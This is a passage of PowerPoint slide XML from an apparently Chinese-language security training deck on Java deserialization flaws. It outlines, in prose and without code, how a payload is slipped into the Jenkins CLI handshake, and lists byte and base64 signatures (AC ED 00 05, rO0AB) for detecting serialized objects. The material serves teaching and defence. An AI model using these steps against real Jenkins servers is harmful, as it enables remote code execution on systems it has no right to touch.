            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="2302510"/>
            <a:ext cx="7844155" cy="2502535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jenkins下的利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过抓包分析出交互流程如下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3）客户端与X-Jenkins-CLI-Port端口建立连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="2173605"/>
            <a:ext cx="7955280" cy="853440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jenkins下的利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过抓包分析出交互流程如下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4）客户端与服务器协商连接类型，X-Jenkins-CLI-Port为非安全模式，X-Jenkins-CLI2-Port为安全模式，数据用密文传输，默认使用X-Jenkins-CLI2-Port。 这里POC程序需要修改为CLI模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="3046095"/>
            <a:ext cx="7171055" cy="941070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>插件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>tamper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>抓包改包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259205" y="1644015"/>
            <a:ext cx="5285740" cy="2999740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jenkins下的利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过抓包分析出交互流程如下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5）服务器返回welcome，与base64编码的序列化对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097915" y="2319020"/>
            <a:ext cx="5364480" cy="2033270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jenkins下的利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过抓包分析出交互流程如下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6）客户端发送这个对象，在服务端执行，这里就是利用点，将payload用base64编码，替换掉原来的base64序列化对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7）客户端发送后续的一些附加数据（可抓包获得后面的数据）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jenkins下的利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过抓包分析出交互流程如下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>因此POC需要构造前面的交互，获取cli端口（服务器随机生成</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的），选择Protocol:CLI-connect模式（明文传输），然后发送</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;===[JENKINS REMOTING CAPACITY]===&gt; +　</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64(payload) + append数据。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1843405" y="466725"/>
            <a:ext cx="5457190" cy="4209415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4223385" y="895350"/>
            <a:ext cx="4771390" cy="335216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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测特征&amp;其他应用漏洞挖掘方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java的序列化数据在报文中的特征比较明显，开头一定会带上AC </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ED 00 05。但是有些报文是加密传输的，对于复杂的加密无法直</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接从报文提取特征。但是对用base64这种简单的编码也是能提取</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>出特征的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测特征&amp;其他应用漏洞挖掘方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Base64加密的可能情况（base64将3字节转换为4字节3×8bit=4×16bit）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AC ED 00 05在开头，按3，1分组ACED00=&gt;rO0A，05xxxx=&gt;BXXX 结果rO0ABxxx 特征：rO0AB</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AC ED 00 05在中间，按2，2分组xxACED=&gt;xxzt, 0005xx=&gt;AAxx, 结果xxztAAxx 特征：ztAA</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AC ED 00 05在中间，按1，3分组xxxxAC=&gt;xxxs, ED0005=&gt;7QAF 结果xxxs7QAF 特征：s7QAF</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测特征&amp;其他应用漏洞挖掘方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对于有流量的厂商可以监控数据中是否包含AC ED 00 05，或者</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>rO0AB等特征。如果发现序列化特征可以进行攻击防护，或者</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0day挖掘。思路如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157855" y="1875155"/>
            <a:ext cx="5200015" cy="23431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lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>弹弹弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>~</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
